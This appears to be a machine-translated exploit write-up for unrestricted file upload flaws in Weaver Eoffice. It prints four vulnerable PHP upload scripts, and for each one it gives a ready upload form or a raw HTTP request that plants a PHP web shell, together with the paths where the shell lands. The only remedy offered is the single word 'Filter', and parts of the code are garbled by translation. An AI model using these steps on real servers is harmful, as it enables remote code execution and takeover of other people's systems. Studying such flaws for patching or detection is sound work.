Getshell can be used to upload any file in Weaver Eoffice.

Getshell can be used to upload any file in Weaver Eoffice.

1. File Location:/webservice/upload. php. The related code is as follows:

<?phpinclude_once( "inc/utility_all.php" );$pathInfor = pathinfo( $_FILES['file']['tmp_name'] );$extension = $pathInfor['extension'];$role = UPLOADROLE;$attachmentID = createfiledir( );global $ATTACH_PATH;$path = $ATTACH_PATH.$attachmentID;if ( !file_exists( $path ) ){mkdir( $path, 448 );}$attachmentName = $_FILES['file']['tmp_name'];$fileName = $path."/".$_FILES['file']['name'];$fileName = iconv( "UTF-8", "GBK", $fileName );move_uploaded_file( $_FILES['file']['tmp_name'], $fileName );if ( !file_exists( $fileName ) ){echo "false";}else{echo $fileName;echo $attachmentID."*".$_FILES['file']['name'];}?>

Directly upload without any restrictions. The file name is the original file name. The file path is as follows:
 

$path = $ATTACH_PATH.$attachmentID$fileName = $path."/".$_FILES['file']['name'];

Construct an upload form as follows:

<Form action = "http: // website address/webservice/upload. php "form enctype =" multipart/form-data "method =" POST "> <input name =" file "type =" file "> <input name =" "type =" submit "> </form>

For example, if the returned content is 3023528241 * I. php, the corresponding path is/attachment/3023528241/I. php.
 

2. File Location: inc/jquery/uploadify. php code:
 

<?phpfunction createFileDir( ){global $ATTACH_PATH;mt_srand( ( double )microtime( ) * 1000000 );$RADOM_ID = mt_rand( ) + mt_rand( );if ( !file_exists( $ATTACH_PATH.$RADOM_ID ) ){return $RADOM_ID;}else{createfiledir( );}}if ( !empty( $_FILES ) ){$tempFile = $_FILES['Filedata']['tmp_name'];$attachmentID = createfiledir( );$uploadPath = $_REQUEST['uploadPath'];if ( trim( $uploadPath ) == "" ){$targetPath = $_SERVER['DOCUMENT_ROOT']."/attachment/".$attachmentID;}else{$targetPath = $uploadPath."/sent/attachment/".$attachmentID;}if ( !file_exists( $targetPath ) ){mkdir( $targetPath, 448, true );}$targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );echo $attachmentID;}?>

The file name is the original file name. You can directly upload the file to the shell.
 

$targetPath = $uploadPath."/sent/attachment/".$attachmentID;$targetFile = str_replace( "//", "/", $targetPath )."/".$_FILES['Filedata']['name'];

Construct an upload form as follows:

<Form action = "http: // website address/inc/jquery/uploadify. php "form enctype =" multipart/form-data "method =" POST "> <input name =" Filedata "type =" file "> <input name =" "type =" submit "> </form>

For example, the returned content 1720699075 corresponds to/attachment/1720699075/2. php.
 

3. File Location:/general/weibo/javascript/LazyUploadify/uploadify. php

Some related code is as follows:

<? Php .... Omitting some code ...... Include_once ("inc/conn. php"); if (! Empty ($ _ FILES) {$ tempFile = $ _ FILES ['filedata'] ['tmp _ name']; $ fileName = $ _ FILES ['filedata'] ['name']; $ thumbWidth = $ _ REQUEST ['thumbwidth']; $ thumbHeight = $ _ REQUEST ['thumbheight']; $ attachmentID = createfiledir (); $ targetPath = ROOT_PATH. "/attachment /". $ attachmentID. "/"; if (! File_exists ($ targetPath) {mkdir ($ targetPath, 448, true);} $ targetPath = str_replace ("//", "/", $ targetPath ); $ targetOriginalFile = $ targetPath. $ fileName; $ targetOriginalFile = iconv ("UTF-8", "GBK", $ targetOriginalFile); move_uploaded_file ($ tempFile, $ targetOriginalFile); $ fileExt = strtolower (substr ($ fileName, strrpos ($ fileName ,". "); switch ($ fileExt) {case ". jpg ": case ". jpeg ": case ". Png": case ". gif": $ targetThumbPath = ROOT_PATH. "/attachment/thumb/". $ attachmentID; if (! File_exists ($ targetThumbPath) {mkdir ($ targetThumbPath, 448, true);} $ targetThumbFile = $ targetThumbPath. "/". $ fileName; $ targetThumbFile = iconv ("UTF-8", "GBK", $ targetThumbFile); resizeimage ($ targetOriginalFile, $ targetThumbFile, $ thumbWidth, $ thumbHeight); break ;} $ targetThumbFile = iconv ("GB2312", "UTF-8", $ targetThumbFile); $ returnValue ['thubmpath'] = str_replace (ROOT_PATH, "", $ targetThum BFile); $ returnValue ['attachmentid'] = $ attachmentID; $ returnValue ['attachmentname'] = $ fileName; $ returnValue ['attachmentsize'] = filesize ($ targetOriginalFile ); echo json_encode ($ returnValue) ;}?>

You can still directly getshell without any filtering. The form is as follows:

<Form action = "http: // website address/general/weibo/javascript/LazyUploadify/uploadify. php "form enctype =" multipart/form-data "method =" POST "> <input name =" Filedata "type =" file "> <input name =" "type =" submit "> </form>

If the returned result is in json format. Path/attachment/2012291572/2 .php
 

4. File Location:/general/weibo/javascript/uploadify. php

Some code is as follows:
 

include_once( "inc/conn.php" );include_once( "general/weibo/inc/weibo.inc.php" );include_once( "general/weibo/inc/thumb_handler.php" );if ( !empty( $_FILES ) ){if ( $_REQUEST['uploadType'] == "log" ){$tempFile = $_FILES['Filedata']['tmp_name'];$fileName = $_FILES['Filedata']['name'];$targetPath = ROOT_PATH."/attachment/";$fileExt = substr( $fileName, strrpos( $fileName, "." ) );$logName = "log".$fileExt;$targetFile = str_replace( "//", "/", $targetPath )."/".$logName;move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );resize( $targetFile, $targetFile, 295, 195 );$query = "SELECT * FROM unit";$result = exequery( $connection, $query );if ( mysql_num_rows( $result ) == 0 ){$query = "INSERT INTO unit (LOGO) VALUES ('".$logName."')";}else{$query = "UPDATE unit SET LOGO = '".$logName."'";}if ( exequery( $connection, $query ) ){echo $logName;}else{echo false;}}else{$tempFile = $_FILES['Filedata']['tmp_name'];$fileName = $_FILES['Filedata']['name'];$userID = $_REQUEST['userID'];$thumbWidth = $_REQUEST['thumbWidth'];$thumbHeight = $_REQUEST['thumbHeight'];$targetPath = ROOT_PATH."/attachment/personal/".$userID;if ( !file_exists( $targetPath ) ){mkdir( $targetPath, 448, true );}$fileExt = substr( $fileName, strrpos( $fileName, "." ) );$targetFile = str_replace( "//", "/", $targetPath )."/".$userID."_temp".$fileExt;move_uploaded_file( $tempFile, iconv( "UTF-8", "GBK", $targetFile ) );$windowWidth = $_REQUEST['windowWidth'];$windowHeight = $_REQUEST['windowHeight'];resize( $targetFile, $targetFile, $windowWidth - 40, $windowHeight - 100 );list( $width, $height ) = getimagesize( $targetFile );echo json_encode( array("width" => $width,"height" => $height,"imageSrc" => "/".str_replace( ROOT_PATH, "", $targetFile )) );}}?>

The form can be self-constructed. The Fiddler request is as follows:
 

POST http://172.18.30.133/general/weibo/javascript/uploadify/uploadify.php?uploadType=log HTTP/1.1Host: 172.18.30.133User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Cookie: zou__Session=7f895dd642da7e165f485c5a638224e4; PHPSESSID=9ed7d522a1e2caf3f2fe76082450b3a8Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------94401197120954Content-Length: 214-----------------------------94401197120954Content-Disposition: form-data; name="Filedata"; filename="2.php"Content-Type: application/x-php
 -----------------------------94401197120954--

Shell path:/attachment/log. php
 

The corresponding path/attachment/personal/$ userID/$ userID_temp.php is as follows:
 

 

In the phith0n case, I randomly selected a test.


 

 

Solution:

Filter